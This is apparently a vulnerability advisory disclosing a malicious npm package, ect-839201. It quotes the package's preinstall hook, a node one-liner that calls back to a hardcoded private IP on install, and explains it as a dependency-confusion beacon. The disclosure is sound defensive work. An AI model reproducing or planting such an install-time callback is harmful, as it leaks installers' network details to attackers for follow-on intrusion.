Vulnerability
Malicious code in ect-839201 (npm)
--- _-= Per source details. Do not edit below this line.=-_ ## Source: amazon-inspector (0ac6cc7433a67e0087dfa415071c9338be630c2166cd38ac371afadbdd0161e3) package.json declares a preinstall lifecycle hook that runs `node -e "require('http').get('http://10.107.121.85:8001/callback_839201')"` on `npm install`. This unconditionally issues an HTTP GET to a hardcoded RFC1918 address (10.107.121.85:8001) over plaintext, with a path (`/callback_839201`) that encodes a unique per-package probe identifier. The behavior fires automatically as part of the install lifecycle with no opt-in. The combination of (a) a bare-IP, non-publisher destination, (b) a unique callback identifier matched to the package name, and (c) plaintext HTTP on an internal/private network is the canonical dependency-confusion reconnaissance beacon: it confirms reachability from the installer's network into an attacker-controlled listener and leaks the installer's source IP, install timing, and the fact that this specific probe package resolved inside the target environment. Even though the captured request body is empty, the install itself is the signal — successful callbacks identify victim networks for follow-on attacks.
No CVSS base score from NVD or GHSA yet. NVD typically scores within 24–72 hours of publication; GHSA usually within a day for OSS-flagged CVEs. Last record update .
For interim severity, fall back on KEV / EXPLOIT signals and the EPSS percentile (lower panel). Re-check this CVE after one cron tick — the score lands automatically when the source publishes.
FIRST.org publishes EPSS daily. Coverage isn't universal — pre-disclosure CVEs and reserved IDs don't carry an EPSS score until at least one exploitation signal lands. Score will appear within 24 hours of the next EPSS pull.
No exploitation, limited impact or prevalence